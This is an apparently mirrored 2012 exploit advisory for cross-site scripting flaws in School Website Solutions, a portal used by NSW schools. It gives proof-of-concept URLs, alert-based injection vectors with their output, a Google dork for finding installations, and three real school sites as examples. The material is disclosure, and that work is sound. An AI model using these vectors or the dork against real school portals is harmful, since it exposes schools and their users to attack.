Lucene search
+L

School Website Solutions Cross Site Scripting

🗓️ 23 Apr 2012 00:00:00Reported by Packet StormType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 26 Views

SWS Cross Site Scripting in School Website Solution

Code
`  
  
===============================================================  
= # Exploit Title: SWS - Cross Site Scripting vulnerabilities =  
= # Date: 23/04/2012 =   
= # Author: Phizo =  
= # Manufacturer: www.schoolwebsitesolutions.com =  
= # Version: Latest (Private software, no version number) =  
= # Category: webapps =  
= # Google dork: inurl:schools.nsw.edu.au/sws/ =  
= # Tested on: Windows 7 & Ubuntu 10.04 - (Firefox 11.0) =  
===============================================================  
  
  
[+] Information: SWS is a private portal software created for NSW schools only, hence why I could not gather details such as the version of the software.  
Multiple XSS vulnerabilities will be shown to show the insecurity of the portal software.  
  
  
[+] Details:  
  
  
========  
Search -- (Value contained within script tags)  
========  
  
# PoC: http://victim/search?search=[XSS]  
  
# Vulnerable code: a.execute("VALUE"); -- VALUE is the value of user input.  
# Vector used: '); alert("XSS"); ('  
# Output: a.execute("");alert("XSS");("");  
  
  
==========  
Calendar  
==========  
  
# PoC: http://victim/calendar?p_p_col_count=3&p_p_col_id=column-1&p_p_col_pos=2&p_p_id=eppvanillacalendarportlet_WAR_eppvanilladefaultportlet&p_p_lifecycle=0&p_p_mode=view&p_p_state=normal&startdate=23-3-2012">[XSS]  
  
# Vulnerable code: (multiple hyperlinks, however I will provide one).  
<a href="http://victim/calendar?p_p_id=eppvanillacalendarportlet_WAR_eppvanilladefaultportlet&p_p_lifecycle=0&p_p_state=normal&p_p_mode=view&p_p_col_id=column-1&p_p_col_count=1&startdate=23-3-2012&print=true" target="_blank" class="printmonth">Print this page</a>  
  
# Vector used: "><script>alert("XSS")</script>  
# Output: <a href="http://victim/calendar?p_p_id=eppvanillacalendarportlet_WAR_eppvanilladefaultportlet&p_p_lifecycle=0&p_p_state=normal&p_p_mode=view&p_p_col_id=column-1&p_p_col_count=1&startdate=23-3-2012"><script>alert("XSS")</script>&print=true" target="_blank" class="printmonth">Print this page</a>  
  
  
[+] Example sites:  
  
http://www.cook-s.schools.nsw.edu.au/  
http://www.lawrenceha-s.schools.nsw.edu.au/  
http://www.parameadow-s.schools.nsw.edu.au/   
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation